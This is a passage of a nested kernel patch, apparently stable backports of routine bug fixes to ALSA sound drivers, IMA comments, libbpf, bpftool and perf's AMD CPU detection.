+  * ima_collect_modsig - Calculate the file hash without the appended signature.
++ * @modsig: parsed module signature
++ * @buf: data to verify the signature on
++ * @size: data size
+  *
+  * Since the modsig is part of the file contents, the hash used in its signature
+  * isn't the same one ordinarily calculated by IMA. Therefore PKCS7 code
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index 2edff7f58c25c..bdc40535ff489 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -694,6 +694,7 @@ static int get_subaction(struct ima_rule_entry *rule, enum ima_hooks func)
+  * @secid: LSM secid of the task to be validated
+  * @func: IMA hook identifier
+  * @mask: requested action (MAY_READ | MAY_WRITE | MAY_APPEND | MAY_EXEC)
++ * @flags: IMA actions to consider (e.g. IMA_MEASURE | IMA_APPRAISE)
+  * @pcr: set the pcr to extend
+  * @template_desc: the template that should be used for this rule
+  * @func_data: func specific data, may be NULL
+@@ -1885,7 +1886,7 @@ static int ima_parse_rule(char *rule, struct ima_rule_entry *entry)
+ 
+ /**
+  * ima_parse_add_rule - add a rule to ima_policy_rules
+- * @rule - ima measurement policy rule
++ * @rule: ima measurement policy rule
+  *
+  * Avoid locking by allowing just one writer at a time in ima_write_policy()
+  * Returns the length of the rule parsed, an error code on failure
+diff --git a/sound/core/jack.c b/sound/core/jack.c
+index 88493cc31914b..03d155ed362b4 100644
+--- a/sound/core/jack.c
++++ b/sound/core/jack.c
+@@ -654,6 +654,7 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 	struct snd_jack_kctl *jack_kctl;
+ 	unsigned int mask_bits = 0;
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
++	struct input_dev *idev;
+ 	int i;
+ #endif
+ 
+@@ -670,17 +671,15 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 					     status & jack_kctl->mask_bits);
+ 
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	idev = input_get_device(jack->input_dev);
++	if (!idev)
+ 		return;
+-	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(jack->key); i++) {
+ 		int testbit = ((SND_JACK_BTN_0 >> i) & ~mask_bits);
+ 
+ 		if (jack->type & testbit)
+-			input_report_key(jack->input_dev, jack->key[i],
++			input_report_key(idev, jack->key[i],
+ 					 status & testbit);
+ 	}
+ 
+@@ -688,13 +687,13 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 		int testbit = ((1 << i) & ~mask_bits);
+ 
+ 		if (jack->type & testbit)
+-			input_report_switch(jack->input_dev,
++			input_report_switch(idev,
+ 					    jack_switch_types[i],
+ 					    status & testbit);
+ 	}
+ 
+-	input_sync(jack->input_dev);
+-	mutex_unlock(&jack->input_dev_lock);
++	input_sync(idev);
++	input_put_device(idev);
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ }
+ EXPORT_SYMBOL(snd_jack_report);
+diff --git a/sound/core/pcm_memory.c b/sound/core/pcm_memory.c
+index 7bde7fb64011e..a0b9514716995 100644
+--- a/sound/core/pcm_memory.c
++++ b/sound/core/pcm_memory.c
+@@ -31,15 +31,41 @@ static unsigned long max_alloc_per_card = 32UL * 1024UL * 1024UL;
+ module_param(max_alloc_per_card, ulong, 0644);
+ MODULE_PARM_DESC(max_alloc_per_card, "Max total allocation bytes per card.");
+ 
++static void __update_allocated_size(struct snd_card *card, ssize_t bytes)
++{
++	card->total_pcm_alloc_bytes += bytes;
++}
++
++static void update_allocated_size(struct snd_card *card, ssize_t bytes)
++{
++	mutex_lock(&card->memory_mutex);
++	__update_allocated_size(card, bytes);
++	mutex_unlock(&card->memory_mutex);
++}
++
++static void decrease_allocated_size(struct snd_card *card, size_t bytes)
++{
++	mutex_lock(&card->memory_mutex);
++	WARN_ON(card->total_pcm_alloc_bytes < bytes);
++	__update_allocated_size(card, -(ssize_t)bytes);
++	mutex_unlock(&card->memory_mutex);
++}
++
+ static int do_alloc_pages(struct snd_card *card, int type, struct device *dev,
+ 			  int str, size_t size, struct snd_dma_buffer *dmab)
+ {
+ 	enum dma_data_direction dir;
+ 	int err;
+ 
++	/* check and reserve the requested size */
++	mutex_lock(&card->memory_mutex);
+ 	if (max_alloc_per_card &&
+-	    card->total_pcm_alloc_bytes + size > max_alloc_per_card)
++	    card->total_pcm_alloc_bytes + size > max_alloc_per_card) {
++		mutex_unlock(&card->memory_mutex);
+ 		return -ENOMEM;
++	}
++	__update_allocated_size(card, size);
++	mutex_unlock(&card->memory_mutex);
+ 
+ 	if (str == SNDRV_PCM_STREAM_PLAYBACK)
+ 		dir = DMA_TO_DEVICE;
+@@ -47,9 +73,14 @@ static int do_alloc_pages(struct snd_card *card, int type, struct device *dev,
+ 		dir = DMA_FROM_DEVICE;
+ 	err = snd_dma_alloc_dir_pages(type, dev, dir, size, dmab);
+ 	if (!err) {
+-		mutex_lock(&card->memory_mutex);
+-		card->total_pcm_alloc_bytes += dmab->bytes;
+-		mutex_unlock(&card->memory_mutex);
++		/* the actual allocation size might be bigger than requested,
++		 * and we need to correct the account
++		 */
++		if (dmab->bytes != size)
++			update_allocated_size(card, dmab->bytes - size);
++	} else {
++		/* take back on allocation failure */
++		decrease_allocated_size(card, size);
+ 	}
+ 	return err;
+ }
+@@ -58,10 +89,7 @@ static void do_free_pages(struct snd_card *card, struct snd_dma_buffer *dmab)
+ {
+ 	if (!dmab->area)
+ 		return;
+-	mutex_lock(&card->memory_mutex);
+-	WARN_ON(card->total_pcm_alloc_bytes < dmab->bytes);
+-	card->total_pcm_alloc_bytes -= dmab->bytes;
+-	mutex_unlock(&card->memory_mutex);
++	decrease_allocated_size(card, dmab->bytes);
+ 	snd_dma_free_pages(dmab);
+ 	dmab->area = NULL;
+ }
+diff --git a/sound/pci/ac97/ac97_codec.c b/sound/pci/ac97/ac97_codec.c
+index ff685321f1a11..534ea7a256ec3 100644
+--- a/sound/pci/ac97/ac97_codec.c
++++ b/sound/pci/ac97/ac97_codec.c
+@@ -2070,8 +2070,8 @@ int snd_ac97_mixer(struct snd_ac97_bus *bus, struct snd_ac97_template *template,
+ 		.dev_disconnect =	snd_ac97_dev_disconnect,
+ 	};
+ 
+-	if (rac97)
+-		*rac97 = NULL;
++	if (!rac97)
++		return -EINVAL;
+ 	if (snd_BUG_ON(!bus || !template))
+ 		return -EINVAL;
+ 	if (snd_BUG_ON(template->num >= 4))
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index eb049014f87ac..72fa1509cc4ba 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9490,9 +9490,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+-	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b77, "HP ElieBook 865 G10", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9680,6 +9680,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa650, "Clevo NP[567]0SN[CD]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+diff --git a/sound/soc/amd/acp/acp-pdm.c b/sound/soc/amd/acp/acp-pdm.c
+index 66ec6b6a59723..f8030b79ac17c 100644
+--- a/sound/soc/amd/acp/acp-pdm.c
++++ b/sound/soc/amd/acp/acp-pdm.c
+@@ -176,7 +176,7 @@ static void acp_dmic_dai_shutdown(struct snd_pcm_substream *substream,
+ 
+ 	/* Disable DMIC interrupts */
+ 	ext_int_ctrl = readl(ACP_EXTERNAL_INTR_CNTL(adata, 0));
+-	ext_int_ctrl |= ~PDM_DMA_INTR_MASK;
++	ext_int_ctrl &= ~PDM_DMA_INTR_MASK;
+ 	writel(ext_int_ctrl, ACP_EXTERNAL_INTR_CNTL(adata, 0));
+ }
+ 
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index f7d7a9c91e04c..87775378362e7 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -52,7 +52,12 @@ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(dac_vol_tlv, -9600, 50, 1);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(adc_vol_tlv, -9600, 50, 1);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_max_gain_tlv, -650, 150, 0);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_min_gain_tlv, -1200, 150, 0);
+-static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_target_tlv, -1650, 150, 0);
++
++static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(alc_target_tlv,
++	0, 10, TLV_DB_SCALE_ITEM(-1650, 150, 0),
++	11, 11, TLV_DB_SCALE_ITEM(-150, 0, 0),
++);
++
+ static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(hpmixer_gain_tlv,
+ 	0, 4, TLV_DB_SCALE_ITEM(-1200, 150, 0),
+ 	8, 11, TLV_DB_SCALE_ITEM(-450, 150, 0),
+@@ -115,7 +120,7 @@ static const struct snd_kcontrol_new es8316_snd_controls[] = {
+ 		       alc_max_gain_tlv),
+ 	SOC_SINGLE_TLV("ALC Capture Min Volume", ES8316_ADC_ALC2, 0, 28, 0,
+ 		       alc_min_gain_tlv),
+-	SOC_SINGLE_TLV("ALC Capture Target Volume", ES8316_ADC_ALC3, 4, 10, 0,
++	SOC_SINGLE_TLV("ALC Capture Target Volume", ES8316_ADC_ALC3, 4, 11, 0,
+ 		       alc_target_tlv),
+ 	SOC_SINGLE("ALC Capture Hold Time", ES8316_ADC_ALC3, 0, 10, 0),
+ 	SOC_SINGLE("ALC Capture Decay Time", ES8316_ADC_ALC4, 4, 10, 0),
+@@ -364,13 +369,11 @@ static int es8316_set_dai_sysclk(struct snd_soc_dai *codec_dai,
+ 	int count = 0;
+ 
+ 	es8316->sysclk = freq;
++	es8316->sysclk_constraints.list = NULL;
++	es8316->sysclk_constraints.count = 0;
+ 
+-	if (freq == 0) {
+-		es8316->sysclk_constraints.list = NULL;
+-		es8316->sysclk_constraints.count = 0;
+-
++	if (freq == 0)
+ 		return 0;
+-	}
+ 
+ 	ret = clk_set_rate(es8316->mclk, freq);
+ 	if (ret)
+@@ -386,8 +389,10 @@ static int es8316_set_dai_sysclk(struct snd_soc_dai *codec_dai,
+ 			es8316->allowed_rates[count++] = freq / ratio;
+ 	}
+ 
+-	es8316->sysclk_constraints.list = es8316->allowed_rates;
+-	es8316->sysclk_constraints.count = count;
++	if (count) {
++		es8316->sysclk_constraints.list = es8316->allowed_rates;
++		es8316->sysclk_constraints.count = count;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/fsl/imx-audmix.c b/sound/soc/fsl/imx-audmix.c
+index 1292a845c4244..d8e99b263ab21 100644
+--- a/sound/soc/fsl/imx-audmix.c
++++ b/sound/soc/fsl/imx-audmix.c
+@@ -228,6 +228,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 
+ 		dai_name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s%s",
+ 					  fe_name_pref, args.np->full_name + 1);
++		if (!dai_name)
++			return -ENOMEM;
+ 
+ 		dev_info(pdev->dev.parent, "DAI FE name:%s\n", dai_name);
+ 
+@@ -236,6 +238,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 			capture_dai_name =
+ 				devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s %s",
+ 					       dai_name, "CPU-Capture");
++			if (!capture_dai_name)
++				return -ENOMEM;
+ 		}
+ 
+ 		priv->dai[i].cpus = &dlc[0];
+@@ -266,6 +270,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 				       "AUDMIX-Playback-%d", i);
+ 		be_cp = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+ 				       "AUDMIX-Capture-%d", i);
++		if (!be_name || !be_pb || !be_cp)
++			return -ENOMEM;
+ 
+ 		priv->dai[num_dai + i].cpus = &dlc[3];
+ 		priv->dai[num_dai + i].codecs = &dlc[4];
+@@ -293,6 +299,9 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 		priv->dapm_routes[i].source =
+ 			devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s %s",
+ 				       dai_name, "CPU-Playback");
++		if (!priv->dapm_routes[i].source)
++			return -ENOMEM;
++
+ 		priv->dapm_routes[i].sink = be_pb;
+ 		priv->dapm_routes[num_dai + i].source   = be_pb;
+ 		priv->dapm_routes[num_dai + i].sink     = be_cp;
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d4f92bb5e29f8..a37c85d301471 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -372,7 +372,7 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		.matches = {
+ 			DMI_MATCH(DMI_PRODUCT_FAMILY, "Intel_mtlrvp"),
+ 		},
+-		.driver_data = (void *)(RT711_JD1 | SOF_SDW_TGL_HDMI),
++		.driver_data = (void *)(RT711_JD1),
+ 	},
+ 	{}
+ };
+diff --git a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+index bc155dd937e0b..a41611671ef6e 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
++++ b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+@@ -1070,6 +1070,10 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 
+ 	afe->dev = &pdev->dev;
+ 
++	irq_id = platform_get_irq(pdev, 0);
++	if (irq_id <= 0)
++		return irq_id < 0 ? irq_id : -ENXIO;
++
+ 	afe->base_addr = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(afe->base_addr))
+ 		return PTR_ERR(afe->base_addr);
+@@ -1156,14 +1160,14 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	comp_hdmi = devm_kzalloc(&pdev->dev, sizeof(*comp_hdmi), GFP_KERNEL);
+ 	if (!comp_hdmi) {
+ 		ret = -ENOMEM;
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 	}
+ 
+ 	ret = snd_soc_component_initialize(comp_hdmi,
+ 					   &mt8173_afe_hdmi_dai_component,
+ 					   &pdev->dev);
+ 	if (ret)
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	comp_hdmi->debugfs_prefix = "hdmi";
+@@ -1175,14 +1179,11 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_cleanup_components;
+ 
+-	irq_id = platform_get_irq(pdev, 0);
+-	if (irq_id <= 0)
+-		return irq_id < 0 ? irq_id : -ENXIO;
+ 	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
+ 			       0, "Afe_ISR_Handle", (void *)afe);
+ 	if (ret) {
+ 		dev_err(afe->dev, "could not request_irq\n");
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 	}
+ 
+ 	dev_info(&pdev->dev, "MT8173 AFE driver initialized.\n");
+diff --git a/tools/bpf/bpftool/feature.c b/tools/bpf/bpftool/feature.c
+index 36cf0f1517c94..4460399bc8ed8 100644
+--- a/tools/bpf/bpftool/feature.c
++++ b/tools/bpf/bpftool/feature.c
+@@ -167,12 +167,12 @@ static int get_vendor_id(int ifindex)
+ 	return strtol(buf, NULL, 0);
+ }
+ 
+-static int read_procfs(const char *path)
++static long read_procfs(const char *path)
+ {
+ 	char *endptr, *line = NULL;
+ 	size_t len = 0;
+ 	FILE *fd;
+-	int res;
++	long res;
+ 
+ 	fd = fopen(path, "r");
+ 	if (!fd)
+@@ -194,7 +194,7 @@ static int read_procfs(const char *path)
+ 
+ static void probe_unprivileged_disabled(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -216,14 +216,14 @@ static void probe_unprivileged_disabled(void)
+ 			printf("Unable to retrieve required privileges for bpf() syscall\n");
+ 			break;
+ 		default:
+-			printf("bpf() syscall restriction has unknown value %d\n", res);
++			printf("bpf() syscall restriction has unknown value %ld\n", res);
+ 		}
+ 	}
+ }
+ 
+ static void probe_jit_enable(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -245,7 +245,7 @@ static void probe_jit_enable(void)
+ 			printf("Unable to retrieve JIT-compiler status\n");
+ 			break;
+ 		default:
+-			printf("JIT-compiler status has unknown value %d\n",
++			printf("JIT-compiler status has unknown value %ld\n",
+ 			       res);
+ 		}
+ 	}
+@@ -253,7 +253,7 @@ static void probe_jit_enable(void)
+ 
+ static void probe_jit_harden(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -275,7 +275,7 @@ static void probe_jit_harden(void)
+ 			printf("Unable to retrieve JIT hardening status\n");
+ 			break;
+ 		default:
+-			printf("JIT hardening status has unknown value %d\n",
++			printf("JIT hardening status has unknown value %ld\n",
+ 			       res);
+ 		}
+ 	}
+@@ -283,7 +283,7 @@ static void probe_jit_harden(void)
+ 
+ static void probe_jit_kallsyms(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -302,14 +302,14 @@ static void probe_jit_kallsyms(void)
+ 			printf("Unable to retrieve JIT kallsyms export status\n");
+ 			break;
+ 		default:
+-			printf("JIT kallsyms exports status has unknown value %d\n", res);
++			printf("JIT kallsyms exports status has unknown value %ld\n", res);
+ 		}
+ 	}
+ }
+ 
+ static void probe_jit_limit(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -322,7 +322,7 @@ static void probe_jit_limit(void)
+ 			printf("Unable to retrieve global memory limit for JIT compiler for unprivileged users\n");
+ 			break;
+ 		default:
+-			printf("Global memory limit for JIT compiler for unprivileged users is %d bytes\n", res);
++			printf("Global memory limit for JIT compiler for unprivileged users is %ld bytes\n", res);
+ 		}
+ 	}
+ }
+diff --git a/tools/lib/bpf/bpf_helpers.h b/tools/lib/bpf/bpf_helpers.h
+index d37c4fe2849d2..2b3b300bf4dfa 100644
+--- a/tools/lib/bpf/bpf_helpers.h
++++ b/tools/lib/bpf/bpf_helpers.h
+@@ -77,16 +77,21 @@
+ /*
+  * Helper macros to manipulate data structures
+  */
+-#ifndef offsetof
+-#define offsetof(TYPE, MEMBER)	((unsigned long)&((TYPE *)0)->MEMBER)
+-#endif
+-#ifndef container_of
++
++/* offsetof() definition that uses __builtin_offset() might not preserve field
++ * offset CO-RE relocation properly, so force-redefine offsetof() using
++ * old-school approach which works with CO-RE correctly
++ */
++#undef offsetof
++#define offsetof(type, member)	((unsigned long)&((type *)0)->member)
++
++/* redefined container_of() to ensure we use the above offsetof() macro */
++#undef container_of
+ #define container_of(ptr, type, member)				\
+ 	({							\
+ 		void *__mptr = (void *)(ptr);			\
+ 		((type *)(__mptr - offsetof(type, member)));	\
+ 	})
+-#endif
+ 
+ /*
+  * Compiler (optimization) barrier.
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 4cd1d49c94d6d..713264899250a 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -2213,9 +2213,25 @@ static int btf_dump_type_data_check_overflow(struct btf_dump *d,
+ 					     const struct btf_type *t,
+ 					     __u32 id,
+ 					     const void *data,
+-					     __u8 bits_offset)
++					     __u8 bits_offset,
++					     __u8 bit_sz)
+ {
+-	__s64 size = btf__resolve_size(d->btf, id);
++	__s64 size;
++
++	if (bit_sz) {
++		/* bits_offset is at most 7. bit_sz is at most 128. */
++		__u8 nr_bytes = (bits_offset + bit_sz + 7) / 8;
++
++		/* When bit_sz is non zero, it is called from
++		 * btf_dump_struct_data() where it only cares about
++		 * negative error value.
++		 * Return nr_bytes in success case to make it
++		 * consistent as the regular integer case below.
++		 */
++		return data + nr_bytes > d->typed_dump->data_end ? -E2BIG : nr_bytes;
++	}
++
++	size = btf__resolve_size(d->btf, id);
+ 
+ 	if (size < 0 || size >= INT_MAX) {
+ 		pr_warn("unexpected size [%zu] for id [%u]\n",
+@@ -2370,7 +2386,7 @@ static int btf_dump_dump_type_data(struct btf_dump *d,
+ {
+ 	int size, err = 0;
+ 
+-	size = btf_dump_type_data_check_overflow(d, t, id, data, bits_offset);
++	size = btf_dump_type_data_check_overflow(d, t, id, data, bits_offset, bit_sz);
+ 	if (size < 0)
+ 		return size;
+ 	err = btf_dump_type_data_check_zero(d, t, id, data, bits_offset, bit_sz);
+diff --git a/tools/perf/arch/x86/util/Build b/tools/perf/arch/x86/util/Build
+index dbeb04cb336e0..93c3ee5f95430 100644
+--- a/tools/perf/arch/x86/util/Build
++++ b/tools/perf/arch/x86/util/Build
+@@ -10,6 +10,7 @@ perf-y += evlist.o
+ perf-y += mem-events.o
+ perf-y += evsel.o
+ perf-y += iostat.o
++perf-y += env.o
+ 
+ perf-$(CONFIG_DWARF) += dwarf-regs.o
+ perf-$(CONFIG_BPF_PROLOGUE) += dwarf-regs.o
+diff --git a/tools/perf/arch/x86/util/env.c b/tools/perf/arch/x86/util/env.c
+new file mode 100644
+index 0000000000000..3e537ffb1353a
+--- /dev/null
++++ b/tools/perf/arch/x86/util/env.c
+@@ -0,0 +1,19 @@
++// SPDX-License-Identifier: GPL-2.0
++#include "linux/string.h"
++#include "util/env.h"
++#include "env.h"
++
++bool x86__is_amd_cpu(void)
++{
++	struct perf_env env = { .total_mem = 0, };
++	static int is_amd; /* 0: Uninitialized, 1: Yes, -1: No */
++
++	if (is_amd)
++		goto ret;
++
++	perf_env__cpuid(&env);
++	is_amd = env.cpuid && strstarts(env.cpuid, "AuthenticAMD") ? 1 : -1;
++	perf_env__exit(&env);
++ret:
++	return is_amd >= 1 ? true : false;
++}
+diff --git a/tools/perf/arch/x86/util/env.h b/tools/perf/arch/x86/util/env.h
+new file mode 100644
+index 0000000000000..d78f080b6b3f8
+--- /dev/null
++++ b/tools/perf/arch/x86/util/env.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _X86_ENV_H
++#define _X86_ENV_H
++
++bool x86__is_amd_cpu(void);
++
++#endif /* _X86_ENV_H */
+diff --git a/tools/perf/arch/x86/util/evsel.c b/tools/perf/arch/x86/util/evsel.c
+index ea3972d785d10..d72390cdf391d 100644
+--- a/tools/perf/arch/x86/util/evsel.c
++++ b/tools/perf/arch/x86/util/evsel.c
+@@ -7,6 +7,7 @@
+ #include "linux/string.h"
+ #include "evsel.h"
+ #include "util/debug.h"
++#include "env.h"
+ 
+ #define IBS_FETCH_L3MISSONLY   (1ULL << 59)
+ #define IBS_OP_L3MISSONLY      (1ULL << 16)
+@@ -97,23 +98,10 @@ void arch__post_evsel_config(struct evsel *evsel, struct perf_event_attr *attr)
+ {
+ 	struct perf_pmu *evsel_pmu, *ibs_fetch_pmu, *ibs_op_pmu;
+ 	static int warned_once;
+-	/* 0: Uninitialized, 1: Yes, -1: No */
+-	static int is_amd;
+ 
+-	if (warned_once || is_amd == -1)
++	if (warned_once || !x86__is_amd_cpu())
+ 		return;
+ 
+-	if (!is_amd) {
+-		struct perf_env *env = evsel__env(evsel);
+-
+-		if (!perf_env__cpuid(env) || !env->cpuid ||
+-		    !strstarts(env->cpuid, "AuthenticAMD")) {
+-			is_amd = -1;
+-			return;
+-		}
+-		is_amd = 1;
+-	}
+-
+ 	evsel_pmu = evsel__find_pmu(evsel);
+ 	if (!evsel_pmu)
+ 		return;
+diff --git a/tools/perf/arch/x86/util/mem-events.c b/tools/perf/arch/x86/util/mem-events.c
+index f683ac702247c..efc0fae9ed0a7 100644
+--- a/tools/perf/arch/x86/util/mem-events.c
++++ b/tools/perf/arch/x86/util/mem-events.c
+@@ -4,6 +4,7 @@
+ #include "map_symbol.h"
+ #include "mem-events.h"
+ #include "linux/string.h"
++#include "env.h"
+ 
+ static char mem_loads_name[100];
+ static bool mem_loads_name__init;
+@@ -26,28 +27,12 @@ static struct perf_mem_event perf_mem_events_amd[PERF_MEM_EVENTS__MAX] = {
+ 	E("mem-ldst",	"ibs_op//",	"ibs_op"),
+ };
+ 
+-static int perf_mem_is_amd_cpu(void)
+-{
+-	struct perf_env env = { .total_mem = 0, };
+-
+-	perf_env__cpuid(&env);
+-	if (env.cpuid && strstarts(env.cpuid, "AuthenticAMD"))
+-		return 1;
+-	return -1;
+-}
+-
+ struct perf_mem_event *perf_mem_events__ptr(int i)
+ {
+-	/* 0: Uninitialized, 1: Yes, -1: No */
+-	static int is_amd;
+-
+ 	if (i >= PERF_MEM_EVENTS__MAX)
+ 		return NULL;
+ 
+-	if (!is_amd)
+-		is_amd = perf_mem_is_amd_cpu();
+-
+-	if (is_amd == 1)
++	if (x86__is_amd_cpu())
+ 		return &perf_mem_events_amd[i];
+ 
+ 	return &perf_mem_events_intel[i];
+diff --git a/tools/perf/builtin-bench.c b/tools/perf/builtin-bench.c
+index 334ab897aae3b..a5c2a6938b4e4 100644
+--- a/tools/perf/builtin-bench.c
++++ b/tools/perf/builtin-bench.c
+@@ -21,6 +21,7 @@
+ #include "builtin.h"
+ #include "bench/bench.h"
+ 
++#include <locale.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+@@ -256,6 +257,7 @@ int cmd_bench(int argc, const char **argv)
+ 
+ 	/* Unbuffered output */
+ 	setvbuf(stdout, NULL, _IONBF, 0);
++	setlocale(LC_ALL, "");
+ 
+ 	if (argc < 2) {
+ 		/* No collection specified. */
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index 7ca238277d835..a794a3d2e47b7 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -2390,6 +2390,9 @@ out_put:
+ 	return ret;
+ }
+ 
++// Used when scr->per_event_dump is not set
++static struct evsel_script es_stdout;
++
+ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 			struct evlist **pevlist)
+ {
+@@ -2398,7 +2401,6 @@ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 	struct evsel *evsel, *pos;
+ 	u64 sample_type;
+ 	int err;
+-	static struct evsel_script *es;
+ 
+ 	err = perf_event__process_attr(tool, event, pevlist);
+ 	if (err)
+@@ -2408,14 +2410,13 @@ static int process_attr(struct perf_tool *tool, union perf_event *event,
+ 	evsel = evlist__last(*pevlist);
+ 
+ 	if (!evsel->priv) {
+-		if (scr->per_event_dump) {
++		if (scr->per_event_dump) { 
+ 			evsel->priv = evsel_script__new(evsel, scr->session->data);
+-		} else {
+-			es = zalloc(sizeof(*es));
+-			if (!es)
++			if (!evsel->priv)
+ 				return -ENOMEM;
+-			es->fp = stdout;
+-			evsel->priv = es;
++		} else { // Replicate what is done in perf_script__setup_per_event_dump()
++			es_stdout.fp = stdout;
++			evsel->priv = &es_stdout;
+ 		}
+ 	}
+ 
+@@ -2721,7 +2722,6 @@ out_err_fclose:
